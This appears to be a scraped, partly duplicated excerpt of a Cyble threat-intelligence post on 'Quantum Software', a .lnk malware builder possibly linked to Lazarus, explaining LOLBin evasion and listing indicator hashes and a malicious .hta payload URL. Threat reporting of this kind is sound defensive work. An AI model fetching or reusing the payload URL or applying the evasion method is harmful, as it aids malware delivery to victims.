Quantum Software: LNK File-Based Builders Growing In Popularity
Contents
Possibly associated with Lazarus APT group
Cyble Research Labs has constantly been tracking emerging threats and their delivery mechanisms. We have observed a surge in the use of .lnk files by various malware families. Some of the prevalent malware families using .lnk files for their payload delivery of late are:
Additionally, we have seen many APT instances where the Threat Actors (TAs) leverage .lnk files for their initial execution to deliver the payload.
.lnk files are shortcut files that reference other files, folders, or applications to open them. The TAs leverages the .lnk files and drops malicious payloads using LOLBins. LOLBins (Living off the Land Binaries) are binaries that are native to Operating Systems such as PowerShell and mshta. TAs can use these types of binaries to evade detection mechanisms as these binaries are trusted by Operating Systems.
During our OSINT (Open Source Intelligence) activity, Cyble Research Labs came across a new. lnk builder …
Cyble Research Labs has constantly been tracking emerging threats and their delivery mechanisms. We have observed a surge in the use of .lnk files by various malware families. Some of the prevalent malware families using .lnk files for their payload delivery of late are:
Additionally, we have seen many APT instances where the Threat Actors (TAs) leverage .lnk files for their initial execution to deliver the payload.
.lnk files are shortcut files that reference other files, folders, or applications to open them. The TAs leverages the .lnk files and drops malicious payloads using LOLBins. LOLBins (Living off the Land Binaries) are binaries that are native to Operating Systems such as PowerShell and mshta. TAs can use these types of binaries to evade detection mechanisms as these binaries are trusted by Operating Systems.
During our OSINT (Open Source Intelligence) activity, Cyble Research Labs came across a new. lnk builder …
IoC
04e8a5c6e5797b0f436ca36452170a2f
2f6c1def83936139425edfd611a5a1fbaa78dfd3997efec039f9fd3338360d25
52b0b06ab4cf6c6b1a13d8eec2705e3b
924be824edb54f917d52e43a551c0eb2848cad8f
b9899082824f1273e53cbf1d455f3608489388672d20b407338ffeecefc248f1
dfdde88da020e584038d2656d0e3d48cfae27b1a
https://quantum-software.online/remote/bdg.hta
2f6c1def83936139425edfd611a5a1fbaa78dfd3997efec039f9fd3338360d25
52b0b06ab4cf6c6b1a13d8eec2705e3b
924be824edb54f917d52e43a551c0eb2848cad8f
b9899082824f1273e53cbf1d455f3608489388672d20b407338ffeecefc248f1
dfdde88da020e584038d2656d0e3d48cfae27b1a
https://quantum-software.online/remote/bdg.hta